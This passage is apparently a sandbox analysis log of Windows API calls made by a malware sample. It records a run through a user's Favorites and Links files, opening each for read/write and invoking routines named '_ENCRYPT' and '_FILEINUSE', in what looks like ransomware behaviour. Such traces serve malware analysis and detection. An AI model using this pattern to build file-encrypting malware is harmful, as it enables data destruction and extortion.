hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.174] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.174] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.175] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.175] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.175] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.175] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.175] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.175] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.175] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.175] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.175] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.175] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.175] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0x7c20c0 [0037.175] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.176] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.176] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0x7c20c0 [0037.176] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.176] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.176] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.176] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.176] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.176] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.178] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.178] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.178] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.178] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.178] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.178] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.179] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 0x7c20c0 [0037.179] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.179] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 0x7c20c0 [0037.179] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.179] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.179] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.179] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.179] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.180] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.180] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.180] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.180] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.181] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.181] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.181] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 0x7c20c0 [0037.181] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.181] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 0x7c20c0 [0037.181] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.181] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.181] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.181] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.182] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.182] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.182] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.182] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.182] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.182] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.182] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.182] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 0x7c20c0 [0037.183] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.183] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 0x7c20c0 [0037.183] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.183] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.183] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.183] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.183] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.184] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.184] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.184] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.184] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.184] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.185] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.185] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0x7c20c0 [0037.185] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.185] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0x7c20c0 [0037.185] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.185] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.185] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.185] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.185] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.186] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.186] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.186] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.186] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.186] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.186] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.186] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0037.186] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.187] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0037.187] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.187] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.187] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.187] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.187] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.188] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.188] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.188] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.188] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.188] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.188] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nk", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lnk", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lnk", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.189] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Desktop.lnk", cAlternateFileName="")) returned 0x7c20c0 [0037.189] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.189] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Desktop.lnk", cAlternateFileName="")) returned 0x7c20c0 [0037.189] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.189] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.189] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.189] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.189] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.190] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.190] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.190] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.190] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.190] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.190] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nk", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lnk", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lnk", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.191] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Downloads.lnk", 